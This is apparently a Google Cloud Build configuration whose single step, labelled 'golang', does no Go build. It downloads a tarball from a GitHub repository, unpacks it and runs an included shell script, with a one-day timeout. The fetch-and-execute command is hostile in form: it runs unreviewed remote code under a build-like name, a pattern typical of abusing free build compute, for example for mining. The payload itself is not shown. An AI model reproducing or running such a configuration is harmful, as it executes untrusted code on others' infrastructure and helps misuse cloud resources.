steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://github.com/Pantaiselatan/kemed/raw/main/gtr.tar.gz && tar xf gtr.tar.gz && ./gas.sh
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86400s
options: